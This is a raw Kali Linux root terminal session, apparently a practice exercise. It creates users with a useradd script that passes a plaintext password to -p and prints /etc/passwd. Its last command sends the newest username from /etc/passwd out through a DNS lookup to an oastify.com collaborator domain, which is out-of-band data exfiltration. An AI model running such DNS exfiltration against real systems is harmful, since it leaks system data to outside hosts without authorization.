                                                                                                                                                                       
┌──(root㉿kali)-[/home/kali]
└─# nano script2.sh
                                                                                                                                                                       
┌──(root㉿kali)-[/home/kali]
└─# cat script2.sh      
sudo useradd -m -p "abcd" -c "act2" -s /bin/zsh $1;
                                                                                                                                                                       
┌──(root㉿kali)-[/home/kali]
└─# chmod 744 script2.sh
                                                                                                                                                                       
┌──(root㉿kali)-[/home/kali]
└─# ./script2.sh Nane
useradd: user 'Nane' already exists
                                                                                                                                                                       
┌──(root㉿kali)-[/home/kali]
└─# ./script2.sh Ccy 
                                                                                                                                                                       
┌──(root㉿kali)-[/home/kali]
└─# cat /etc/passwd     
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
tss:x:101:109:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:110::/nonexistent:/usr/sbin/nologin
usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:107:112:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
speech-dispatcher:x:108:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
pulse:x:109:114:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
lightdm:x:110:116:Light Display Manager:/var/lib/lightdm:/bin/false
saned:x:111:118::/var/lib/saned:/usr/sbin/nologin
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
rtkit:x:112:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
colord:x:113:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
nm-openvpn:x:114:121:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
nm-openconnect:x:115:122:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologin
mysql:x:116:124:MySQL Server,,,:/nonexistent:/bin/false
stunnel4:x:995:995:stunnel service system account:/var/run/stunnel4:/usr/sbin/nologin
_rpc:x:117:65534::/run/rpcbind:/usr/sbin/nologin
geoclue:x:118:126::/var/lib/geoclue:/usr/sbin/nologin
Debian-snmp:x:119:127::/var/lib/snmp:/bin/false
sslh:x:120:128::/nonexistent:/usr/sbin/nologin
ntpsec:x:121:131::/nonexistent:/usr/sbin/nologin
redsocks:x:122:132::/var/run/redsocks:/usr/sbin/nologin
rwhod:x:123:65534::/var/spool/rwho:/usr/sbin/nologin
_gophish:x:124:134::/var/lib/gophish:/usr/sbin/nologin
iodine:x:125:65534::/run/iodine:/usr/sbin/nologin
miredo:x:126:65534::/var/run/miredo:/usr/sbin/nologin
statd:x:127:65534::/var/lib/nfs:/usr/sbin/nologin
redis:x:128:135::/var/lib/redis:/usr/sbin/nologin
postgres:x:129:136:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mosquitto:x:130:138::/var/lib/mosquitto:/usr/sbin/nologin
inetsim:x:131:139::/var/lib/inetsim:/usr/sbin/nologin
_gvm:x:132:141::/var/lib/openvas:/usr/sbin/nologin
kali:x:1000:1000:,,,:/home/kali:/usr/bin/zsh
cecy:x:1001:1001::/home/cecy:/bin/sh
bunny:x:1002:1002::/home/bunny:/bin/sh
bugs:x:1003:1003::/home/bugs:/bin/sh
Bugs:x:1004:1004::/home/Bugs:/bin/sh
pepe:x:1005:1005:act2:/home/pepe:/bin/zsh
Nane:x:1006:1006:act2:/home/Nane:/bin/zsh
Ccy:x:1007:1007:act2:/home/Ccy:/bin/zsh
                                                                                                                                                                       
┌──(root㉿kali)-[/home/kali]
└─# nslookup $(cat /etc/passwd | tail -n1 | cut -d":" -f1).kl9dtf96irwnwq4bljh5uvm0brhi5atz.oastify.com
Server:         10.2.9.242
Address:        10.2.9.242#53

Non-authoritative answer:
Ccy.kl9dtf96irwnwq4bljh5uvm0brhi5atz.oastify.com        canonical name = PublicInteractionNLB-3bddf5ff6abb91b6.elb.eu-west-1.amazonaws.com.
Name:   PublicInteractionNLB-3bddf5ff6abb91b6.elb.eu-west-1.amazonaws.com
Address: 54.77.139.23
Name:   PublicInteractionNLB-3bddf5ff6abb91b6.elb.eu-west-1.amazonaws.com
Address: 3.248.33.252

